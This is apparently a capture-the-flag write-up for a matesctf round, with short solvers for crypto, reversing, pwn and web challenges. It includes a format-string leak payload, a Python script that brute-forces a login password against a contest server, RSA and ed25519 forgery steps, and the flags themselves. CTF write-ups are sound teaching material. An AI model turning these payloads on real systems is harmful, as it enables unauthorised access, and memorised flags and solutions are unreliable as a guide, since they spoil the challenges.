| description |
|---|
I dont use IDA in this round and this write up...and talk is cheap, read the code. |
Rotate to find the flag:
kc1{sm}htscaX3y4ttXc_nfe
{% code title="solver.py" %}
s = "kc1{sm}htscaX3y4ttXc_nfe"
out = ""
pos = 0
for i in range(0, len(s)):
if i % 4 == 0 and i != 0:
p = 5
else:
p = 6
pos += p
out += s[pos%len(s)]
print out{% endcode %}
{% code title="flag" %}
matesctf{s4n1ty_ch3ck}
{% endcode %}
{% code title="server.py" %}
import random
import gmpy2
import sys
flag = ''
def PoW():
r = random.getrandbits(1024)
p = gmpy2.next_prime(r)
print 'Give me a triple that a^2 + b^2 = c^2 mod p (a,b,c > 1)'
print 'which r < c < p, r =', r, 'and p =', p
try:
a,b,c = [int(i) for i in raw_input().split(' ')]
if a < 2 or b < 2 or c < r or a > p or b > p or c > p:
return False
if (a*a + b*b) % p == (c*c) % p:
return True
return False
except:
return False
if __name__ == '__main__':
print 'We have a new proof of work system. Hope you can pass it'
if not PoW():
sys.exit(0)
'''
Do some thing in here
'''
print flag{% endcode %}
So, just find k.
{% code title="flag" %}
matesctf{w0w!_y0u_4r3_th3_tru3_m4st3r}
{% endcode %}
Find the flag
https://pastebin.com/pEH3xMmi
Deobfuscate and beautify the js code, we have :
var arr = [0x4df, 0x20c, 0x3f5, 0xe7, 0x50a, 0xc0, 0x31e, 0x44e, 0x1a0, 0x409, 0x3a0, 0x48f, 0x54, 0x114, 0x48f, 0x158, 0x4a3, 0xb7, 0x36e, 0x25, 0x26a, 0x14, 0x3d, 0xf5, 0x328, 0x3, 0x9, 0x29f, 0x223, 0x162, 0x2, 0xc3, 0x16c, 0x4b5, 0x14c, 0x26e, 0x18a, 0x1f6, 0x38e, 0x48a, 0x399, 0xd4, 0xb, 0x339, 0x439, 0x35a]
var res = ["28147733412126416143356431805908788848700221138704543049914240750210634423746310795983766007927465537337773675180806753151701119440592637649120674223666407488884928441158916203204899710775857273445369674102642893364763591400590102447525349505851152484162354348321887410090849255334994123327420802898472430345805178661836803666639323568991",
"4473996724368524833786391433108844308119859952032682936027584205386586896550944640275021793883201700700514551906732365044019104422174629553761105852002509929562143469997523117124506809324566089069073128574094653939495701324286126323872403203843117997709033282947687736178657057176776167569597189544477293458075431109037887022922995862044778186014072",
"5221757322360453814399619119797328730081768639738340228795306317929495307424129397533164035147145139501711378195989662703457058674922647017677641997958212209715853394405199698854615367381241522638332855369669637921940456218422736881713766324155332523065076931150147930439076555927630923249342658654421542335027590781652594413705304583637509924249026877718528",
"4288796074237034437390498054578069998869358869004476456766478523669292199763563859166332976529271326671723122114069619124487514887631605436360899314383687525668071526886099615149600968654081981644745693079557652346743251676118813596297248841958787152919005957747751054440747976230293600734615766823819034154768821138600838634394395607040",
"14076013253790208221380376940543328033797996734937324461092670075568213933095877897871317709593483134711226289488906499692279422330149725140662609542530782668583349028232449084925688965827512898667668297465086787068857681189679064721661863552760708013615289105346008454343049850126111059987669613256302532637101210381393593",
"3170984862814335610889394857268118759960325521680787540826832022026645554821331792672346549865014011745531958862686754481741463830750936074693372236094260712570608495334431476244124947276622402417881608109775154769166561656581871",
"640534593409367944820111634498760938267977163203823820715780096258045201701884350666759909980314003408439218106009709023441498640277221820882329768881560600249454971874214496593510400",
"3054008491803476523991722331221283812575362956565248969531261498410356443440844995468505356120150838872923755597173544178108356009061441377375965518974487023563293955608211326519992225805676224046227075326718674868707224298790643639447097559142628200669923116286300598253677807",
"11825467005351759256803982016693419569859778726116603161520080056295405434359637802900995806871281744944894725671551548372627936387090472057639283764362883564011763689677293068969256929904750428106728266855094662559407016466487151568491033269952394841089030309505860777621941045942191545096050",
"95315558114905684185983985374975183308951113563062623116475198835692716601937445684935504522932043984030863952175035421805721885279402513792926454829",
"568411832949614651671142719945415608127060862485085190627402422679334039283858151423074972328444453188994097026126033531745745182080440373699487557208262922088414788870610222425071924576508046242112164217950489665579590122429337038781735868490767027930556344827671269493314745010314564749975857545925515864563310856530558976",
"336977722880191342605575603118791200417398331912137888340963370337110660382606419040522445704275195130010931083480119765953266883459481380782253911818762412576824761062151635689211563031457817906379156566",
"550980307981869851269598052405393915654137449193107513051581276222976204511239411472488703652429952478106978377307176964955131352658257626996213492171855578347127673258296322799076009982396194892143126682738410757818300814252177596972575825143602239301940843722620880682241410122913099229483",
"2116883984537179161323051237302600348205261488554202476306373757191773587930042802714540061481828893455114076308887612828288496439778691034823640798092679111474708450621749610480729543435147050165775498058724327335652288975750792680298065894794942053493523979750248709053919864532299418562",
"69399375244028224296642472209316572707515378986312745114686995580970893877402763319257611514920487047800277191373708351938644016364554332685488473426826389617490173998496242153068462686126093317159995413848975293933851440015669145081177295951049351767703267253592914502486194187",
"108069568093999851662822458713653641799313823651313411726442264688305780526449872871578134658368114229428136524302518871595277609778936351286025083447082899477595981950684257493405990766341354174493412441775130883314659513416700069639555437917371",
"810168139475125483474436257612533737098123885235428798630565546494464723025531420196151417421770610696476308685128054281577220738814998009464066172718837044339991297438068334616471134595700413548441652396529038549589448408573522520319029333573237076094959436510970778357141221383928802814529338473459789626277378370074639253787522155414409",
"25709128146585820308323789054322316306741541122564289869333094354728180791328346068105293286719059385473674347464040003022820308134361990829451853626575214956590963849132803894527744140191922090907047586017660459356274997166009612370291300171348102939148799637979136",
"20586947507559441775857953638972752821850324822265326533025116982642596424691534453969981555866296315169930333224915952011544646505792545652650150396785304286172795619455937383787749912084684960586776069292294416743476954660022058721443347705140193251202533638418316582665764995072",
"31228646052679859515463165346865716942464022533455185436751817507356247657636130374582296029363951202093935664822422820552386581073358951047329630542546821224082154582056386185405241963474261350635809881772014052271509265044443425580418128640962720914886585048513848597866310933007135087668196645121895054790134905892165910528",
"402406390215000280827794679583610110408732123703853481176670825453960685564431613879605832281716093912057305520208643580463751956991954154250304497560335889609341867460347361654352493185289131298557807863773711898310920025355446196482988507754127542467837062283029214819629978834345",
"45248618545403619762841478032308849940249937192500109908548344603743340141365377191917807648219437711559443118349663821666714276892426064382596581675506",
"4851890390156174270135015984067408628443606400167912403797688925806912120242318647460426393207026321666262379026053686013574664475317152408144154745390289512723808744249055757655231288588261603032037978960629407963317577071005529207550710551649520103710842971763164677843537776551079122571097576939749759108109841488895365934592210991209564188234383045302346014616009"];
const BigNumber = require("bignumber.js")
BigNumber.config({
POW_PRECISION: 0
})
const readline = require("readline").createInterface({
input: process.stdin,
output: process.stdout
})
readline.question('What is the flag?', c => {
for (var d = 0; d < c.length; d = d + 2) {
var e = BigNumber(c.charCodeAt(d));
var f = BigNumber(c.charCodeAt(d + 1));
var g = BigNumber(arr[d]).exponentiatedBy(e);
var h = BigNumber(arr[d + 1]).exponentiatedBy(f);
if (!BigNumber(res[d / 2]).isEqualTo(g.plus(h))) {
console.log('KO');
}
}
console.log("You must know the flag by now!");
readline.close();
});So the equation we need to solve looks like this
Since g, h, c is known and e, f is in string.printable => We can bruteforce it!
{% code title="flag" %}
matesctf{OMG_I'm_s0_t1r3d_0f_m4k1ng_l0ng_fl4g}
{% endcode %}
telnet 35.247.166.229 1337
https://drive.google.com/file/d/1pQQTrpqqDPzYXEOQFAkYACSaBruHO2Wt/view
It was simple format string attack. Just input
%x %x %x %x %x %x
The number you need to find is the 6th
Warm up
http://35.187.239.167:8080
http://125.235.240.167:8080
We just need bruteforce the password since if substr(input_password, flag) == True, it will log you in
import requests
import string
flag = "matesctf{"
url = "http://125.235.240.167:8080"
found = ''
while found != '}':
for c in string.printable:
data ={
"username":"admin",
"password":flag+c
}
r = requests.post(url, data)
if "Well" in r.text:
print flag
flag += c
found = c
pass{% code title="flag" %}
matesctf{suck_a_3cm_weath3r}
{% endcode %}
Find the flag :D
https://gist.github.com/minhtt159/8b7715ddd5d03b65d1cd1e4690d11727
So basically we know
Where c1, c2 are known
From Bézout Identity :
To get m, we take :
It will look like this
pow(m1,32769,N) * pow(invert(m2,N),32768,N) % N
AFAIK, You can solve this challenge without source
nc 125.235.240.166 12345
Read this write up : (Btw sha256(flag) is a joke...i am so dumb...)
https://github.com/liamh95/CTF-writeups/tree/master/CSAW17/baby_crypt
matesctf{s33?_y0u_c4n_d0_1t_w1th0ut_s0urc3}
Prove that you are tictactoe and you can have the flag
nc 125.235.240.166 15997
https://gist.github.com/minhtt159/ab1eea6fc9fa22a8e94b071192e48847
We are so lucky, read this write up, everything is there...
https://grocid.net/2016/04/14/sctf-ed25519/
{% code title="pow" %}
Welcome to the admin panel
You can choose one of these keys to sign your message
1. 893731438d5dd099be08dd60b0befc32996eda16ea3a0b56d7f261251d27fd62
2. b1ecbe4f2573a7dffcb35f9c15c40849fa7504f7e95d44efc967b959da393164
3. e5c8620b47d1c4a17b7bb6c48a6a8246a6e58dd8c9a54184b76c1cbedb8f31f2
4. 85166ca9caf0385d6aee6973c83ec93887047ec8993e695ba15b9a0a8fa4a35a
5. 3be36f7a4d6d2f4970a8a7443d999127949b363fc271e1db1eadac3216072bb8
Commands:
1. Sign
2. Execute
Your choice: 2
Public key: 5bfcb1cd3938f3f6f3092da5f7d7a1bdb1d694a725d0585a99208787554e110d
Your command: tictactoe
Your signature: 68299a51b6b592e2db83c26ca3594bdd81bdbb9f11c597a1deb823da7c8b9de82a1db6766d2bc10b4b3d570df4fa549077c125f87d9eb2b031675cc6bec91007
{% endcode %}
{% code title="flag" %}
matesctf{Br1ng_m0r3_Curv3_Plz}
{% endcode %}
https://github.com/Hi-Im-darkness/CTF/tree/master/matesctf2018/Round2/xmodem
https://github.com/kungfulon/matesctf-s3/tree/master/round2/re/MiniFactory
Nice ctf, nice organizer, kudos to all players!